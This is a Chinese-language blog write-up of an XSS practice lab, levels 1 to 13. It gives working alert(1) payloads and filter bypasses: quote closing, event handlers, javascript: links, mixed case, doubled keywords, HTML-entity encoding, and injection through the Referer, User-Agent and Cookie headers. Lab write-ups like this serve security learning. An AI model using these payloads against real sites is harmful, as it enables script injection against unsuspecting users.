XSS Lab

Level-1

payload:

?name=<script>alert(1);</script>

Level-2

用1的payload查看源代码发现 '/'和''都被过滤转义了
放弃 script< 类
还可以用 onclick=alert(1)这种
输入后查看源代码 发现需要 闭合 value=" 后面的引号 然后再加上"//"将后面注释掉
payload:

?keyword=" onclick=alert(1) //

Level-3

与2类似 只是闭合的是单引号而已
payload:

?keyword=' onclick=alert(1) //

Level-4

跟2 一样 ……

Level-5

尝试发现 script on 都被过滤掉了
我们可以选择

<a href="javascript:alert(1)">

这种形式
观察源码发现除了要闭合引号外还要闭合 '>'
payload:

?keyword=" ><a href="javascript:alert(1)">//

Level-6

能试的都试了还是不行
看WP说是 大小写绕过
payload: 随便大小写怎么绕都可以

?keyword=" ><sCript>alert(1);</scRipt>//

实战记得尝试大小写绕过!!!

Level-7

能试的关键词都被过滤了个干净
观察源码发现 直接是置为""了 所以可以尝试 双写绕过
payload:

?keyword=" ><scrscriptipt>alert(1)</scripscriptt> //

Level-8

emmmm...
源码有个

<a href="">

尝试注入到href中可是所有关键词都被改写了
尝试Unicode 编码后提交
再点击 友情链接即可激活弹窗

Level-9

与8一样是超链接跳转 只是这题必须要求有 http:// 格式
所以可以把 JavaScript语句写前面 用 // 注释掉后面的 http://
还是需要对语句进行unicode 编码
其实干脆都Unicode编码算了...
payload:

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41; //http://127.0.0.1

Level-10

观察源码发现有几个 hidden类型的可以用来触发XSS
尝试后发现 t_sort 可行 构造payload(注意引号的闭合)

?t_sort=" type="text" onclick=alert(1) //

然后点击出现的文本框即可

Level-11

有个 t_ref 用burpsuite抓包后发现是 refer的值
refer存在XSS注入
所以直接构造refer:

 " type="text" onclick=alert(1) //

点击文本框即可

Level-12

User-Agent 存在XSS注入
构造 UA:

" type="text" onclick=alert(1) //

点击文本框即可

Level-13

Cookie 存在XSS注入
构造Cookie:

" type="text" onclick=alert(1) //
posted @ 2023-08-31 19:15  N0zoM1z0  阅读(3)  评论(0编辑  收藏  举报